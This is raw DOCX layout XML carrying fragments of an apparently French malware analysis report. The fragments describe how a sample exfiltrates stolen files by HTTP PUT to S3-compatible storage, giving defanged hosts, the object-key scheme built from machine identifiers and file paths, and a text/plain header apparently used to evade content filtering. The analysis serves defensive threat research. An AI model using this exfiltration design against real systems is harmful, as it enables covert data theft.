                            <a:pt x="5760720" y="921385"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="354965"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="354965"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="576707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0720" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2125980</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6565909</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="2901950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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901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901950">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="290195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1744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6559559</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="2914649"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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914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914649">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="29146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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4050664</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1694189</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="280673" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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67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067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280670" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="28067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4032" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4302124</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5899159</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2045973" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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597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5970" h="199389">
                          <a:moveTo>
                            <a:pt x="1192530" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1192530" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2045970" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2045970" y="199389"/>
                          </a:lnTo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1017270" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="101727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8128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7040889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="609600" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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00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609600" y="198754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="198754"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="608965" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608965" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="60960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0176" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5498465</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7128519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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2224" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4070985</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7128519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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4512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7518409</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1101090" cy="1195070"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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090" cy="1195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090" h="1195070">
                          <a:moveTo>
                            <a:pt x="634" y="1195070"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="634" y="995680"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1100455" y="995680"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1100455" y="1195070"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="996315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1101090" y="996315"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="634" y="589280"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="634" y="389890"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="692150" y="588645"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="588645"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="691515" y="389890"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="691515" y="589280"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="390525"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="692150" y="390525"/>
                          </a:lnTo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281940" y="198755"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="198755"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="281305" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="281305" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="28194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8608" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6426199</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8298189</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="199390" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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9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9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98755" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="198755" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="19939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4752" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2160269</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8514089</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3448050" cy="414019"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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48050" cy="4140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48050" h="414019">
                          <a:moveTo>
                            <a:pt x="3447415" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3447415" y="414019"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1855470" y="215264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3448050" y="21526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017905" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1017905" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="101854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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4016374</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8728719</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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4992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9118609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2081530" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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153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81530" h="199389">
                          <a:moveTo>
                            <a:pt x="1226184" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1226184" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2080895" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2080895" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1225550" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2081530" y="634"/>
                          </a:lnTo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1017904" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1017904" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="101853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601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2989577</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="2473960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="254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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-50" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="2473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2473960">
                          <a:moveTo>
                            <a:pt x="0" y="2473960"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="2473960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247396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806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9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2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La méthode principale consiste en une requête HTTP PUT adressée à un service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0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2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stockage d’objets compatible S3. Le fournisseur spécifique est déterminé par une chaîne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1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5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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configuration déchiffrée présente dans le registre. Dans l’échantillon analysé, cette valeur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2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1477910</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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correspond à </w:t>
                        </w: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tebi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, ce qui redirige le trafic exclus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ivem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ent vers </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="51"/>
                          </w:rPr>
                          <w:t xml:space="preserve">s3.tebi[.]io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. La fonction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3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1677935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5796489" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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48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vérifie si la configuration a été définie sur</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="10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set</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="26"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> ; dans ce cas, elle utilise </w:t>
                        </w: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de-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4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1872880</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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fra.i3storage[.]com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; toute autre valeur est interprétée comme un sous-domaine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5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2052585</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4642330" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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2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région spécifique, injecté dans </w:t>
                        </w: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hxxps://s3.[VALUE].wasabisys[.]com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6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2337458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Pour les premières requêtes adressées à un service S3, la fonction injecte les métadonnées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2510813</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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directement dans l’URL. Le schéma utilisé pour construire cette requête PUT est structuré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8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2684168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="827097" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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70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comme suit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9328" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1853565</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5440065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3890365" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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90365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17 – Schéma utilisé pour construire la requête PUT liée à l’exfiltration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0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5692798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Les différents éléments composant la clé d'objet S3 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t les en-têtes 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sso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ciés sont dét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aillés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5884768</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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dans le tableau ci-dessous. Noter que cela impose le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Content-Type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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> à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text/plain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quel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2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6081418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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que soit le format réel du fichier, probablement afin de contourner les politiques de filtrage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3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6254773</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1440939" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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93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basées sur le contenu.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4448" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1277619</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6571003</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="509141" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1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Champ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5472" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3956050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6571003</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="912220" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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2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Motif / Valeur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6496" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2161540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6922158</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4540133" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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01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Concaténation du nom de l'ord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inateur et du numéro d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e série du volume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0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7025863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="607783" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7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USER_ID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8544" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2161540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7115833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1945535" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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553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 hexadécimal (par exemple,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9568" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4090034</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7114128</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492221" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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22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DESKTOP-5A_182392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0592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7504018</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="280885" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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88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MD5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1616" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2161540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7507628</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1944602" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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460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Condensat MD5 du fichier volé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2640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7893908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="689507" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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50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FILENAME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3664" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2161540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7897518</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3916446" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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164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nom de fichier original, tronqué aux 100 derniers caractères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4688" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2161540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8283798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4482870" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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287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Chemin d'accès au répertoire parent, sans la racine utilisateur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5712" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2179955</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8499063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4521718" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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17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\Users\Admin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) ni les deux-points des lettres de lecteur. Tronqué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6736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8499063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1097711" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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771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RELATIVE_PATH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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2161540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8714328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3529936" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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993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170 caractères (par exemple,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\Documents\ProjectX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8784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9104218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1015986" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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598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Content-Type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9808" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2179955</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9104218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1742144" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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214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text/plain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(codé en dur)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08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185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288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390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492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60902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6948179</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760085" cy="349885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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349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349885">
                          <a:moveTo>
                            <a:pt x="990600" y="349885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="349885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="990600" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="990600" y="349885"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="349885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="989965" y="349885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="989965" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="349885"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="990600" y="349885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="349885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760085" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="990600" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="990600" y="349885"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="349885"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="989965" y="349885"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="989965" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="34988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9504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6948179</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5767070" cy="2754629"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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27546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2754629">
                          <a:moveTo>
                            <a:pt x="5763895" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5763895" y="2754629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="993775" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="993775" y="2748279"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="2754629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="2751454"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5767070" y="2751454"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1872614"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1872614"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1174114"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1174114"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="353694"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="353694"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="576707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1552" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6402705</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2489209</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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7696" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4811395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2489209</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1226184" cy="414019"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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6184" cy="4140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26184" h="414019">
                          <a:moveTo>
                            <a:pt x="372109" y="414019"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="372109" y="214629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1225550" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1225550" y="414019"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="371475" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1226184" y="215265"/>
                          </a:lnTo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1008" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>934719</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7340609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5692139" cy="431168"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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2139" cy="4311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92139" h="431165">
                          <a:moveTo>
                            <a:pt x="991869" y="431165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3155950" y="431165"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="992504" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="992504" y="214629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5691505" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5691505" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="991869" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5692139" y="215265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="992504" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="992504" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5690235" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5690235" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="991869" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5690870" y="634"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="634" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="634" y="214629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="855345" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="855345" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="855979" y="21526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2032" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4090034</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7771139</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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2272" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1926589</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7771139</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3352799" cy="634999"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="25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2799" cy="634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52799" h="634999">
